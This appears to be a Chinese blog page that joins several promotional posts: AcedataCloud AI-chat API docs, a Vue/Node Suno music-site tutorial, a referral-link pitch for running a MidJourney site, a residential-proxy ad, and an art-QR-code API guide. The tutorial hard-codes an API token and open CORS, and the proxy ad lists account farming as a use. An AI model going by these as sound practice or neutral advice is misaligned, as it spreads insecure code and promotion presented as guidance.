AceDataCloud 提供的 AI 问答 API 针对上述情况进行了优化，在保证问答效果不变的情况下，对连续对话的实现进行了封装，对接时无需再关心 messages 的传递，也无需关心 Token 超出限制的问题（API 内部自动进行了处理），同时也提供了对话查询、修改等功能，使得整体的对接大大简化。

本文档会介绍下 AI 问答 API 的对接说明。

申请流程

要使用 API，需要先到 AI 问答 API 对应页面申请对应的服务，进入页面之后，点击「Acquire」按钮，如图所示：

如果你尚未登录或注册，会自动跳转到登录页面邀请您来注册和登录，登录注册之后会自动返回当前页面。

在首次申请时会有免费额度赠送，可以免费使用该 API。

基本使用

首先先了解下基本的使用方式，就是输入问题，获得回答，只需要简单地传递一个 question 字段，并指定相应模型即可。

比如说询问：“What’s your name？”，我们接下来就可以在界面上填写对应的内容，如图所示：

可以看到这里我们设置了 Request Headers，包括：

accept：想要接收怎样格式的响应结果，这里填写为 application/json，即 JSON 格式。
authorization：调用 API 的密钥，申请之后可以直接下拉选择。

另外设置了 Request Body，包括：

model：模型的选择，比如主流的 GPT 3.5，GPT 4 等。
question：需要询问的问题，可以是任意的纯文本。

选择之后，可以发现右侧也生成了对应代码，如图所示：

点击「Try」按钮即可进行测试，如上图所示，这里我们就得到了如下结果：

1
2
3

{
  "answer": "I am an AI language model developed by OpenAI and I don't have a personal name. However, you can call me GPT or simply Chatbot. How can I assist you today?"
}

可以看到，这里返回的结果中有一个 answer 字段，就是该问题的回答。我们可以输入任意问题，就可以得到任意的回答。

如果你不需要任何多轮对话的支持，这个 API 可以极大方便你的对接。

另外如果想生成对应的对接代码，可以直接复制生成，例如 CURL 的代码如下：

curl -X POST 'https://api.acedata.cloud/aichat/conversations' \
-H 'accept: application/json' \
-H 'authorization: Bearer {token}' \
-H 'content-type: application/json' \
-d '{
  "model": "gpt-3.5",
  "question": "What's your name?"
}'

Python 的对接代码如下：

import requests

url = "https://api.acedata.cloud/aichat/conversations"

headers = {
    "accept": "application/json",
    "authorization": "Bearer {token}",
    "content-type": "application/json"
}

payload = {
    "model": "gpt-3.5",
    "question": "What's your name?"
}

response = requests.post(url, json=payload, headers=headers)
print(response.text)

多轮对话

如果您想要对接多轮对话功能，需要传递一个额外参数 stateful，其值为 true，后续的每次请求都要携带该参数。传递了 stateful 参数之后，API 会额外返回一个 id 参数，代表当前对话的 ID，后续我们只需要将该 ID 作为参数传递，就可以轻松实现多轮对话。

下面我们来演示下具体的操作。

第一次请求，将 stateful 参数设置为 true，并正常传递 model 和 question 参数，如图所示：

对应代码如下：

curl -X POST 'https://api.acedata.cloud/aichat/conversations' \
-H 'accept: application/json' \
-H 'authorization: Bearer {token}' \
-H 'content-type: application/json' \
-d '{
  "model": "gpt-3.5",
  "question": "What's your name?",
  "stateful": true
}'

可以得到如下回答：

{
  "answer": "I am an AI language model created by OpenAI and I don't have a personal name. You can simply call me OpenAI or ChatGPT. How can I assist you today?",
  "id": "7cdb293b-2267-4979-a1ec-48d9ad149916"
}

第二次请求，将第一次请求返回的 id 字段作为参数传递，同时 stateful 参数依然设置为 true，询问「What I asked you just now?」，如图所示：

对应代码如下：

curl -X POST 'https://api.acedata.cloud/aichat/conversations' \
-H 'accept: application/json' \
-H 'authorization: Bearer {token}' \
-H 'content-type: application/json' \
-d '{
  "model": "gpt-3.5",
  "stateful": true,
  "id": "7cdb293b-2267-4979-a1ec-48d9ad149916",
  "question": "What I asked you just now?"
}'

结果如下：

{
  "answer": "You asked me what my name is. As an AI language model, I do not possess a personal identity, so I don't have a specific name. However, you can refer to me as OpenAI or ChatGPT, the names used for this AI model. Is there anything else I can help you with?",
  "id": "7cdb293b-2267-4979-a1ec-48d9ad149916"
}

可以看到，就可以根据上下文回答对应的问题了。

流式响应

该接口也支持流式响应，这对网页对接十分有用，可以让网页实现逐字显示效果。

如果想流式返回响应，可以更改请求头里面的 accept 参数，修改为 application/x-ndjson。

修改如图所示，不过调用代码需要有对应的更改才能支持流式响应。

将 accept 修改为 application/x-ndjson 之后，API 将逐行返回对应的 JSON 数据，在代码层面我们需要做相应的修改来获得逐行的结果。

Python 样例调用代码：

import requests

url = "https://api.acedata.cloud/aichat/conversations"

headers = {
    "accept": "application/x-ndjson",
    "authorization": "Bearer {token}",
    "content-type": "application/json"
}

payload = {
    "model": "gpt-3.5",
    "stateful": True,
    "id": "7cdb293b-2267-4979-a1ec-48d9ad149916",
    "question": "Hello"
}

response = requests.post(url, json=payload, headers=headers, stream=True)
for line in response.iter_lines():
    print(line.decode())

输出效果如下：

{"answer": "Hello", "delta_answer": "Hello", "id": "7cdb293b-2267-4979-a1ec-48d9ad149916"}
{"answer": "Hello!", "delta_answer": "!", "id": "7cdb293b-2267-4979-a1ec-48d9ad149916"}
{"answer": "Hello! How", "delta_answer": " How", "id": "7cdb293b-2267-4979-a1ec-48d9ad149916"}
{"answer": "Hello! How can", "delta_answer": " can", "id": "7cdb293b-2267-4979-a1ec-48d9ad149916"}
{"answer": "Hello! How can I", "delta_answer": " I", "id": "7cdb293b-2267-4979-a1ec-48d9ad149916"}
{"answer": "Hello! How can I assist", "delta_answer": " assist", "id": "7cdb293b-2267-4979-a1ec-48d9ad149916"}
{"answer": "Hello! How can I assist you", "delta_answer": " you", "id": "7cdb293b-2267-4979-a1ec-48d9ad149916"}
{"answer": "Hello! How can I assist you today", "delta_answer": " today", "id": "7cdb293b-2267-4979-a1ec-48d9ad149916"}
{"answer": "Hello! How can I assist you today?", "delta_answer": "?", "id": "7cdb293b-2267-4979-a1ec-48d9ad149916"}

可以看到，响应里面的 answer 即为最新的回答内容，delta_answer 则是新增的回答内容，您可以根据结果来对接到您的系统中。

JavaScript 也是支持的，比如 Node.js 的流式调用代码如下：

const axios = require("axios");

const url = "https://api.acedata.cloud/aichat/conversations";
const headers = {
  "Content-Type": "application/json",
  Accept: "application/x-ndjson",
  Authorization: "Bearer {token}",
};
const body = {
  question: "Hello",
  model: "gpt-3.5",
  stateful: true,
};

axios
  .post(url, body, { headers: headers, responseType: "stream" })
  .then((response) => {
    console.log(response.status);
    response.data.on("data", (chunk) => {
      console.log(chunk.toString());
    });
  })
  .catch((error) => {
    console.error(error);
  });

Java 样例代码：

String url = "https://api.acedata.cloud/aichat/conversations";
OkHttpClient client = new OkHttpClient();
MediaType mediaType = MediaType.parse("application/json");
RequestBody body = RequestBody.create(mediaType, "{\"question\": \"Hello\", \"stateful\": true, \"model\": \"gpt-3.5\"}");
Request request = new Request.Builder()
        .url(url)
        .post(body)
        .addHeader("Content-Type", "application/json")
        .addHeader("Accept", "application/x-ndjson")
        .addHeader("Authorization", "Bearer {token}")
        .build();

client.newCall(request).enqueue(new Callback() {
    @Override
    public void onFailure(Call call, IOException e) {
        e.printStackTrace();
    }

    @Override
    public void onResponse(Call call, Response response) throws IOException {
        if (!response.isSuccessful()) throw new IOException("Unexpected code " + response);
        try (BufferedReader br = new BufferedReader(
                new InputStreamReader(response.body().byteStream(), "UTF-8"))) {
            String responseLine;
            while ((responseLine = br.readLine()) != null) {
                System.out.println(responseLine);
            }
        }
    }
});

其他语言可以另外自行改写，原理都是一样的。

模型预设

我们知道，OpenAI 相关的 API 有对应的 system_prompt 的概念，就是给整个模型设置一个预设，比如它叫什么名字等等。本 AI 问答 API 也暴露了这个参数，叫做 preset，利用它我们可以给模型增加预设，我们用一个例子来体验下：

这里我们额外添加 preset 字段，内容为 You are a professional artist，如图所示：

对应代码如下：

curl -X POST 'https://api.acedata.cloud/aichat/conversations' \
-H 'accept: application/json' \
-H 'authorization: Bearer {token}' \
-H 'content-type: application/json' \
-d '{
  "model": "gpt-3.5",
  "stateful": true,
  "question": "What can you help me?",
  "preset": "You are a professional artist"
}'

运行结果如下：

1
2
3

{
    "answer": "As a professional artist, I can offer a range of services and assistance depending on your specific needs. Here are a few ways I can help you:\n\n1. Custom Artwork: If you have a specific vision or idea, I can create custom artwork for you. This can include paintings, drawings, digital art, or any other medium you prefer.\n\n2. Commissioned Pieces: If you have a specific subject or concept in mind, I can create commissioned art pieces tailored to your preferences. This could be for personal enjoyment or as a unique gift for someone special.\n\n3. Art Consultation: If you need guidance on art selection, interior design, or how to showcase and display art in your space, I can provide professional advice to help enhance your aesthetic sense and create a cohesive look."
}

可以看到这里我们告诉 GPT 他是一个机器人，然后问它可以为我们做什么，他就可以扮演一个机器人的角色来回答问题了。

图片识别

本 AI 也能支持添加附件进行图片识别，通过 references 传递对应图片链接即可，比如我这里有一张苹果的图片，如图所示：

该图片的链接是 https://cdn.acedata.cloud/ht05g0.png，我们直接将其作为 references 参数传递即可，同时需要注意的是，模型必须要选择支持视觉识别的模型，目前支持的是 gpt-4-vision，所以输入如下：

对应的代码如下：

curl -X POST 'https://api.acedata.cloud/aichat/conversations' \
-H 'accept: application/json' \
-H 'authorization: Bearer {token}' \
-H 'content-type: application/json' \
-d '{
  "model": "gpt-4-vision",
  "question": "How many apples in the picture?",
  "references": ["https://cdn.acedata.cloud/ht05g0.png"]
}'

运行结果如下：

1
2
3

{
  "answer": "There are 5 apples in the picture."
}

可以看到，我们就成功得到了对应图片的回答结果。

联网问答

本 API 还支持联网模型，包括 GPT-3.5、GPT-4 均能支持，在 API 背后有一个自动搜索互联网并总结的过程，我们可以选择模型为 gpt-3.5-browsing 来体验下，如图所示：

代码如下：

curl -X POST 'https://api.acedata.cloud/aichat/conversations' \
-H 'accept: application/json' \
-H 'authorization: Bearer {token}' \
-H 'content-type: application/json' \
-d '{
  "model": "gpt-3.5-browsing",
  "question": "What's the weather of New York today?"
}'

运行结果如下：

1
2
3

{
  "answer": "The weather in New York today is as follows:\n- Current Temperature: 16°C (60°F)\n- High: 16°C (60°F)\n- Low: 10°C (50°F)\n- Humidity: 47%\n- UV Index: 6 of 11\n- Sunrise: 5:42 am\n- Sunset: 8:02 pm\n\nIt's overcast with a chance of occasional showers overnight, and the chance of rain is 50%.\nFor more details, you can visit [The Weather Channel](https://weather.com/weather/tenday/l/96f2f84af9a5f5d452eb0574d4e4d8a840c71b05e22264ebdc0056433a642c84).\n\nIs there anything else you'd like to know?"
}

可以看到，这里它自动联网搜索了 The Weather Channel 网站，并获得了里面的信息，然后进一步返回了实时结果。

如果对模型回答质量有更高要求，可以将模型更换为 gpt-4-browsing，回答效果会更好。

作者崔庆才发表于 2024-05-30 阅读次数：本文字数： 9.1k 阅读时长 ≈ 8 分钟

人工智能 五分钟搭建自己的AI音乐站点率

在这个数字化时代，人工智能技术正以惊人的速度改变着我们的生活方式和创造方式。音乐作为一种最直接、最感性的艺术形式，自然也成为了人工智能技术的应用场景之一。今天，我们将以 Vue 和 Node.js 为基础，利用现有的 API 来快速搭建一个 Suno AI 音乐站点。让我们一起探索这个令人兴奋的过程吧！

一、准备工作

在动手之前，我们需要确保已经准备好了必要的环境和工具：

Vue 和 Node.js 环境：确保你的开发环境中已经配置好了 Vue 和 Node.js，这将是我们构建前端和后端的基础。

文本编辑器或 IDE：选择你熟悉和喜欢的文本编辑器，如 VS Code、Sublime Text 等。

Suno AI音乐API密钥：这是我们生成音乐所需的关键。这里我们选择的是Acedata提供的Suno API,注册方法如下：

我们先到 Suno Audios Generation API 页面申请Suno API 服务：

如果你尚未登录或注册，会跳转到登录页面邀请您来注册和登录，注册登录之后会自动返回当前页面。

在首次申请时会有免费额度赠送，可以免费使用该 API。申请了API后，在 Credentials 查找到 Token,点击复制这个值备用，类似这样的：8125d23343388839c6e

好了，现在，我们获得了 Suno API,下面就可以来快速的搭建 AI 音乐生成平台了。

二、搭建前端和后端

1. 创建 Vue 项目

为了更清晰地组织前端和后端代码，我们将项目目录结构分为两个主要部分：frontend 和 backend。以下是具体的目录结构和说明：

目录结构

suno-music-site/
│
├── backend/
│   ├── node_modules/
│   ├── package.json
│   ├── package-lock.json
│   └── server.js
│
├── frontend/
│   ├── node_modules/
│   ├── public/
│   ├── src/
│   │   ├── assets/
│   │   ├── components/
│   │   ├── App.vue
│   │   ├── main.js
│   ├── package.json
│   ├── package-lock.json
│   └── vue.config.js
│
└── README.md

我们创建一个 suno-music-site 目录。

2.创建后端

创建后端目录和文件，在项目根目录下创建 backend 目录，并进入该目录：

1 2	mkdir backend cd backend

初始化 Node.js 项目

在 backend 目录下初始化 Node.js 项目：

1	npm init -y

安装 Express 和其他依赖
安装 Express 和所需的依赖包：

1	npm install express body-parser node-fetch

创建 server.js
在 backend 目录下创建 server.js 文件，并添加以下代码：

const express = require('express');
const bodyParser = require('body-parser');
const fetch = require('node-fetch').default; // 使用CommonJS版本的node-fetch
const cors = require('cors'); // 引入cors中间件

const app = express();
const PORT = 3000;

app.use(cors()); // 使用cors中间件
app.use(bodyParser.json());

app.post('/generate-music', async (req, res) => {
  const { prompt } = req.body;
  const options = {
    method: "post",
    headers: {
      "accept": "application/json",
      "authorization": "Bearer 6675520380424c0167881d69c6e",
      "content-type": "application/json"
    },
    body: JSON.stringify({
      "prompt": prompt
    })
  };

  try {
    const response = await fetch("https://api.acedata.cloud/suno/audios", options);
    const data = await response.json();        
    res.json(data);

  } catch (error) {
    console.error(error);
    res.status(500).json({ error: 'An error occurred' });
  }
});

app.listen(PORT, () => {
  console.log(`Server is running on http://localhost:${PORT}`);
});

3.创建前端

回到项目根目录，创建 frontend 目录，并进入该目录：

1
2
3

cd ..
mkdir frontend
cd frontend

创建 Vue 项目
使用 Vue CLI 创建 Vue 项目：

1	vue create .

选择默认配置或根据你的需要进行配置。

编写前端代码
我们创建一个简单的界面来接收用户输入并显示生成的音乐。

在 frontend/src 目录下，修改 App.vue 文件，添加以下代码：

<template>
  <div id="app">
    <header>
      <h1>XiaoZhi AI Music Generator</h1>
    </header>
    <main>
      <div class="input-container">
        <input type="text" v-model="musicTitle" placeholder="Enter a prompt for the music">
        <button @click="handleGenerateMusic" :disabled="loading">生成音乐</button>
      </div>
      
      <div v-if="loading" class="loading">
        Music is being generated for you, please wait...
      </div>

      <div v-if="musicGenerated" class="music-container">
        <div v-for="music in generatedMusic" :key="music.id" class="music-item">
          <h2>{{ music.title }}</h2>
          <img :src="music.image_url" alt="Music Image">
          <p class="lyric">{{ music.lyric }}</p>
          <audio controls class="audio" @play="stopOtherMedia($event)">
            <source :src="music.audio_url" type="audio/mpeg">
            Your browser does not support the audio element.
          </audio>
          <video controls class="video" @play="stopOtherMedia($event)">
            <source :src="music.video_url" type="video/mp4">
            Your browser does not support the video element.
          </video>
        </div>
      </div>

      <div v-if="showModal" class="modal">
        <div class="modal-content">
          <p>{{ modalMessage }}</p>
        </div>
      </div>
    </main>
  </div>
</template>

<script>
import axios from 'axios';

export default {
  data() {
    return {
      musicTitle: '',
      musicGenerated: false,
      generatedMusic: [],
      loading: false,
      currentPlayingMedia: null,
      showModal: false,
      modalMessage: ''
    };
  },
  mounted() {
    document.title = "XiaoZhi AI Music Generator";
  },
  methods: {
    handleGenerateMusic() {
      if (!this.musicTitle) {
        this.showModalMessage('请输入生成音乐的提示语');
        return;
      }
      this.generateMusic();
    },
    generateMusic() {
      this.loading = true;
      this.musicGenerated = false;
      axios.post('http://localhost:3000/generate-music', { prompt: this.musicTitle })
        .then(response => {
          this.loading = false;
          this.musicGenerated = true;
          this.generatedMusic = response.data.data;
        })
        .catch(error => {
          this.loading = false;
          console.error('Error generating music:', error);
        });
    },
    stopOtherMedia(event) {
      if (this.currentPlayingMedia && this.currentPlayingMedia !== event.target) {
        this.currentPlayingMedia.pause();
        this.currentPlayingMedia.currentTime = 0;
      }
      this.currentPlayingMedia = event.target;
    },
    showModalMessage(message) {
      this.modalMessage = message;
      this.showModal = true;
      setTimeout(() => {
        this.showModal = false;
      }, 2000);
    }
  }
}
</script>

<style scoped>
#app {
  font-family: Avenir, Helvetica, Arial, sans-serif;
  text-align: center;
  color: #2c3e50;
  margin-top: 60px;
}

header {
  background-color: #42b983;
  padding: 20px;
  color: white;
}

main {
  margin: 20px;
  max-width: 80%;
  margin: 20px auto;
}

.input-container {
  display: flex;
  flex-direction: row;
  justify-content: center;
  align-items: center;
  margin-bottom: 20px;
}

input[type="text"] {
  padding: 7px;
  margin-right: 10px;
  font-size: 1em;
  flex: 1;
  max-width: 600px;
}

button {
  padding: 8px 20px;
  background-color: #007bff;
  color: #fff;
  border: none;
  cursor: pointer;
  font-size: 1em;
  border-radius: 4px;
}

button:disabled {
  background-color: #d3d3d3;
  cursor: not-allowed;
}

button:hover:not(:disabled) {
  background-color: #0056b3;
}

.loading {
  font-size: 1.2em;
  color: #42b983;
  margin-top: 20px;
}

.music-container {
  display: flex;
  flex-wrap: wrap;
  gap: 20px;
}

.music-item {
  flex: 1;
  min-width: 300px;
  max-width: 45%;
  margin-top: 20px;
  padding: 20px;
  border: 1px solid #ddd;
  border-radius: 8px;
  background-color: #f9f9f9;
  text-align: left;
}

.lyric {
  font-size: 1.2em;
  margin: 10px 0;
  white-space: pre-line;
}

.audio {
  width: 100%;
  margin-top: 10px;
}

.video {
  width: 100%;
  height: auto;
  margin-top: 10px;
}

.modal {
  position: fixed;
  top: 0;
  left: 0;
  width: 100%;
  height: 100%;
  display: flex;
  justify-content: center;
  align-items: center;
  background-color: rgba(0, 0, 0, 0.5);
}

.modal-content {
  background-color: white;
  padding: 20px;
  border-radius: 5px;
  text-align: center;
  font-size: 1.2em;
}

@media (max-width: 600px) {
  .input-container {
    flex-direction: column;
  }
  
  input[type="text"] {
    margin-right: 0;
    margin-bottom: 10px;
    max-width: 100%;     
    
  }

  .music-item {
    max-width: 100%;
  }
}

@media (min-width: 601px) {
  .video {
    width: 100%;
    margin: 10px auto;
  }
}
</style>

4.解决跨域问题

在你的项目运行中，可能会出现跨域请求的问题，我们需要解决它。
你可以在现有的 vue.config.js 文件中添加开发服务器代理配置，以解决跨域问题。以下是修改后的 vue.config.js 文件内容：

const { defineConfig } = require('@vue/cli-service')

module.exports = defineConfig({
  transpileDependencies: true,
  devServer: {
    proxy: {
      '/generate-music': {
        target: 'http://localhost:3000',
        changeOrigin: true
      }
    }
  }
})

这样配置后，当前端发起请求到 /generate-music 时，代理服务器会将请求转发到运行在 http://localhost:3000 的后端服务，从而解决跨域问题。

如果还无法解决的话，你可能还需要处理一下。由于浏览器安全策略的限制，前端和后端运行在不同的域（例如，localhost 和 192.168.0.235）时，浏览器会阻止跨域请求。我们需要在后端服务器中设置适当的 CORS 头信息来允许跨域请求。

你可以使用 cors 中间件来解决这个问题。

安装 cors 包：

1	npm install cors

在 server.js 文件中引入并使用 cors 中间件：

这样，后端服务器将允许来自所有来源的请求。如果你想限制特定来源的请求，可以这样配置 cors 中间件：

1
2
3

app.use(cors({
  origin: 'http://192.168.20.235:8081' // 允许的前端URL
}));

这样应该能解决CORS问题，并允许前端正常调用后端API。

如果 Node.js 无法直接使用 ES 模块（ES Module）加载 node-fetch，因 node-fetch 是一个 ES 模块。解决这个问题的一种方法是将 node-fetch 替换为一个可以在 CommonJS 环境中使用的版本。

你可以安装 node-fetch 的 CommonJS 版本，并修改 server.js 文件中的引入方式。
首先，删除项目中已安装的 node-fetch：

1	npm uninstall node-fetch

安装 node-fetch 的 CommonJS 版本：

1	npm install node-fetch@2

在 server.js 文件中，将引入方式修改为动态引入（dynamic import），上面的代码已经修改好了。

三. 运行项目

启动后端服务

在 backend 目录下，启动后端服务：

1	node server.js

启动前端服务
在 frontend 目录下，启动前端服务：

1	npm run serve

打开浏览器，访问 http://localhost:8080（Vue CLI 默认端口），你将看到一个简单的界面，输入一个提示词并点击“Generate Music”按钮，即可生成音乐。

默认会生成两首音乐，有 MP3 和 MP4 视频，点击即可播放 AI 生成的音乐。

点击以下音频或视频链接试听：

MP3试听 https://cdn1.suno.ai/ab8dcd9b-3527-46da-b0c7-4d1a78b51846.mp3

MP4试看 https://cdn1.suno.ai/3cbd5b7b-7354-48a3-8158-9cd87e1b116b.mp4

四、结语

通过这种方式，我们成功地将前端和后端代码分离，清晰地组织在不同的目录下，同时也实现了跨域请求。希望这个项目能给你带来启发，并帮助你更好地理解和实现类似的项目。

这样我们就搭建好了一个本地的 AI 音乐生成平台，如果你愿意，可以将代码打包后上传到服务器，再绑定一个域名，就可以提供给其他小伙伴一起来使用了。

通过 Vue 和 Node.js，以及 Acedata 提供的 Suno AI 音乐 API 的强大功能，我们在短短的时间内成功搭建了一个AI音乐生成网站。这个过程不仅展示了人工智能技术在音乐创作中的威力，也向我们展示了如何利用现有的技术来创造出令人惊叹的新体验。希望这个项目能够激发你的创造灵感，并让你更加深入地探索人工智能与音乐的奇妙结合！

在线体验站点：

http://suno.morecale.com莫卡乐AI音乐

发表于 2024-05-27 阅读次数：本文字数： 9.3k 阅读时长 ≈ 8 分钟

人工智能 搭建一个自己的 MidJourney 平台：开启你的赚钱之旅

在当今数字化时代，越来越多的人开始寻找在线赚钱的机会。无论你是一个技术爱好者，还是一个创业新手，搭建 MidJourney 并将其转化为一个盈利项目，都是一个绝佳的选择。本文将带你了解如何零代码搭建一个 MidJourney 绘画平台，并通过这个项目实现盈利。

什么是 MidJourney？

MidJourney 是一个创新的绘画平台，懂的人自然懂，我就不作更多的介绍了，下面直接上干货。

搭建的是一个什么样的平台？

国内可用：一个无需科学上网，即可在国内正常使用的 MidJourney 平台。

如何搭建这样的一个平台？

下载代码：在 github 上下载 Nexior 开源代码，地址如下：https://github.com/acedatacloud 。
如果你不方便访问，可以到官网 https://platform.acedata.cloud/?inviter_id=aef91f35-f7f9-494d-bcf6-3a533440101f 联系客服即可。

注册域名：如果你只是需要自己用，可以不用注册域名，如果你想通过搭建的平台赚钱，那就得注册一个域名。方法很简单，直接搜索一下注册域名，按照网上的教程 30 分钟就可以搞定。

一台服务器：同样的，如果只是需要自己用，可不需要服务器，如果想要通过自己的网站赚钱，你还得准备一台 linux 服务器，刚起步，也不要太好的服务器，一年 100 元左右的就可以了，腾讯云阿里云都可，不过建议选择香港的服务器。

开始搭建

上传代码：将下载下来的 Nexior 压缩包上传到服务器上并解压。修改 src 目录下 config.ts 里的邀请码为自己的邀请码。

邀请码如何获得？这个就是我们可以赚钱的核心了，直接点击下面的链接注册即可。 https://platform.acedata.cloud/?inviter_id=aef91f35-f7f9-494d-bcf6-3a533440101f

生成镜像：在当前目录下执行终端命令：

 docker build -t morecale .

morecale 这个名称你可自己随意取一个其它的即可。

创建容器：创建一个容器，按照如下提示操作：

创建网站：创建一个静态网页，并设置好域名与反向代理即可，然后在上面申请好免费的 SSL 证书。

成功案例分享

为了激励你，我分享一些朋友搭建的网站案例：

莫卡乐 AI 助手

莫卡乐通过 Nexior 搭建的一个 Midjourney 平台，从最开始搭建的供自己使用到推荐给朋友们使用，不到三个月，已获收益近 2000 元了，虽然不多，但不需要如何打理即可躺赚，想想也是挺开心的一件事。

小智 AI

小智 AI 也是网友通过 Nexior 搭建的一个 AI 平台。并且还创建了多个在线课程，吸引了大量学员，每月收入稳定增长。

分销比例

提高比例：从上图中你可能看到了，最开始的分销比例不是很高？哈哈，我告诉你一个小窍门，你添加底部的业务微信，可以与他申请，调高你的分销分成比例呢，我就是与他联系后，直接提到了 17% 的，当然，你能提高到多少，就看你的运气了。

结语

搭建 MidJourney 并通过这个项目赚钱，不仅可以实现个人收入的增长，还能帮助你在数字化时代实现自我价值。立即行动，开启你的 MidJourney 赚钱之旅吧！

作者崔庆才发表于 2024-05-22 阅读次数：本文字数： 1.3k 阅读时长 ≈ 1 分钟

技术杂谈 分享一个好用的住宅IP

随着互联网的普及和发展，海外住宅IP的需求日益增加。个人用户可以通过使用海外住宅 IP 来访问特定地区的新闻、娱乐、教育和文化资源，从而获得更高的访问速度、优质的用户体验和更强的网络安全性。

对于企业而言，海外住宅IP为进军国际市场提供了重要的支持。通过了解目标市场的需求和竞争环境，企业可以制定相应的营销策略和产品定位。海外住宅 IP 还有助于企业进行市场推广活动，实现定向投放广告和提供个性化的客户体验，从而提升品牌知名度和市场份额。

一、海外住宅 IP 的可靠性

海外住宅 IP 的可靠性主要取决于供应商的信誉和服务质量。为了保障用户的在线安全和隐私，选择一个可靠的海外住宅 IP 提供商至关重要。在此推荐 SmartProxy，一家优质海外住宅代理和全球IP资源服务商。SmartProxy 提供稳定可靠的服务，而且价格相对较为实惠。注册即领免费流量：

二、选择SmartProxy的理由

• 提供200+国家和地区的真实家庭住宅IP，汇聚优质IP资源池。

• 提供纯净高匿代理，无限带宽，确保网络数据采集不受封锁。

• 价格实惠，支持HTTP/HTTPS/SOCKS5协议，可根据业务需求定制独享IP。

• 支持自定义国家、IP时效和城市，精准定位，提供更快更稳定的连接。

• 提供全天候实时支持，专业团队随时提供帮助和支持。

除了海外住宅 IP 业务，SmartProxy 还提供静态住宅 IP 服务，这种 IP 地址是固定不变的，适用于需要长期稳定连接的应用场景。

SmartProxy 的海外代理适用于爬虫采集、市场调查、品牌保护、广告验证、社交媒体、海外电商运营、FB/TK/PayPal 养号等各种应用场景。SmartProxy 已为众多知名网站和企业提供服务，支持 API 批量使用和多线程超高并发。

请点击以下链接进行免费测试👉: smartproxy 住宅 IP，我们的客服团队将 24/7 在线解答您的问题，欢迎随时联系我们。

作者崔庆才发表于 2023-11-26 阅读次数：本文字数： 782 阅读时长 ≈ 1 分钟

Other 艺术二维码 API 申请及使用

艺术二维码是一种创新的技术产品，它将二维码与美观的背景图像相结合，创造出既实用又美观的作品。它们不仅具有传统二维码的功能性，能被智能设备快速扫描识别，还加入了艺术元素，增强了视觉吸引力和品牌识别度。其中，部分艺术二维码甚至由人工智能生成，充分利用了现代技术，展示出无与伦比的创新和独特性。这使得艺术二维码在品牌营销、广告推广等领域有着广泛的应用。

简单来说，艺术二维码是扫描二维码与艺术美感的完美结合，它不仅提供了信息传递的功能，同时也能提升用户的视觉体验，使得每一次的扫描都充满艺术的享受。

作品概览

我们先来看几个二维码作品：

怎么样？这些二维码就是艺术二维码，它实现了图片和二维码的完美结合，比普通的二维码更加具有艺术感。而且关键是，每一个二维码都能扫描！

怎样制作？

想制作这样的二维码吗？怎么来制作这样的艺术二维码呢？

其实这个从技术来讲是相对复杂的。在现在这个 AI 时代，目前艺术二维码的解决方案是基于 Stable Diffusion 来做的，通过输入 prompt 我们可以生成对应的图片，同时结合一些二维码内容的融合最终实现这样的效果。

所以这里面其实最主要的挑战在于：如何既把二维码做得好看而且富有艺术，而且二维码还能被正确扫描。说实话这个技术其实还是蛮难的，需要大量的参数调整才能做到稍微好点的效果。

应该 99% 的人在第一步就放弃了。

假设通过不断的调整，我们真的做出来了这样的效果，真正运行起来也是一个不小的开销，如果要速度比较快的话，可能得性能比较好的 GPU，可能一不小心就上万块钱了。

有朋友可能会说：我不想费那么多精力，我也不想花那么多钱，我就想做个艺术二维码，或者我想把这个能力集成到我的产品里面，要是有这样现成的 API 就好了。

有吗？还真有。

这里推荐一个知数云平台，知数云平台提供了艺术二维码相关生成 API，我们可以调用 API 输入各种参数，比如图片内容、二维码链接、样式风格等等各种参数，就可以非常方便地生成想要的艺术二维码了，而且首次申请免费赠送 20 张绘制次数。

申请 API

知数云平台是什么呢？简单来说，它是一个提供多样数字化 API 的服务平台，其官网链接是：https://data.zhishuyun.com。

要使用艺术二维码 API，首先可以到艺术二维码 API 页面点击「获取」按钮：

如果你尚未登录，会自动跳转到登录页面，扫码关注公众号即可自动登录，无需额外注册步骤。

登录完了之后会跳回原页面，此时会提示「您尚未申请该服务，需要申请」。

申请时会校验实名认证情况，请按照网站提示完成实名认证。实名认证会校验姓名、手机号、身份证号，需要三者一致才可以通过认证。认证完了之后可以返回页面，刷新一下页面确保信息更新，然后重新申请即可通过申请。

基本使用

要使用艺术二维码的最基本的功能，需要填入如下几个必须参数：

type：二维码的类型，如纯文本、链接等。
content：二维码的内容，比如如果是链接的话，我们可以填入对应的链接。
prompt：二维码对应的风格绘制指令，强烈建议用英文。比如说 pizza 则会绘制一个像披萨的二维码。

接下来，我们来生成一个知数云官网的二维码，类型是链接，内容是 https://data.zhishuyun.com，prompt 这里填写如下内容：

(best quality, masterpiece:1.2), underwater, ((pirate ship)), close up, zoom in, absurdes, big waves, twister, water falling, tentacles, ((glowing lights)), ((lighting storm)), fog, smoke, 4k res, 8k, higly detailed textures, cinematic shot, intricate details, side view

在测试页面填写如下内容：

然后点击测试：

过一会就发现艺术二维码就生成了，结果类似如下：

{
  "task_id": "a7e8831c-203d-447e-83fc-71783c766446",
  "image_url": "https://qrart.cdn.zhishuyun.com/attachments/1132182283529494652/1136344944630563006/Germey_2023-08-02__64ca8da51e5834b500e077bf.png",
  "image_width": 768,
  "image_height": 768
}

二维码如下：

这样我们就生成了一个二维码，主体是一个船只，悬挂着几个旗帜，而这些旗帜恰恰构成了二维码的定位点。

用手机扫描一下，就可以跳转到知数云的官网了。

同时上述内容调用方案我们可以非常方便地转成 API 调用。

prompt 指南

通过上述操作可以看到，艺术二维码关键在于 prompt 的编写，那 prompt 的编写都有什么讲究呢？

其实这个都是通用的 Stable Diffusion 的 prompt 指令，艺术二维码就是基于 Stable Diffusion 技术加上一些特殊调优生成的，所以它的输入 prompt 和 Stable Diffusion 是完全一样的。

如果你还不知道什么是 Stable Diffusion，可以到它的官网了解下：https://stablediffusionweb.com/，还有 prompt 教程和指南：https://stable-diffusion-art.com/prompt-guide/，另外 Stable Diffusion 还制作了 prompt 生成器，可以帮助我们生成 prompt：https://stablediffusionweb.com/prompt-generator，除此之外还有一些 prompt 样例集合网站：https://publicprompts.art/

如上内容仅作参考，如果更多，可以自行搜索 Stable Diffusion 相关的资料进行学习。

高级参数

本 API 还提供了更多高级参数方便进行更多功能定制，说明如下：

pattern：预设二维码组合。预设二维码风格组合，如定位框的样式（方形、圆形等）、点的样式（方形、圆形等）。
preset：预设背景风格。二维码背景的风格，如超现实风格、霓虹效果、手绘风格等。
steps：绘制迭代次数。当次数越大，绘制的二维码艺术风格越强，范围为 10-20，默认是 16。
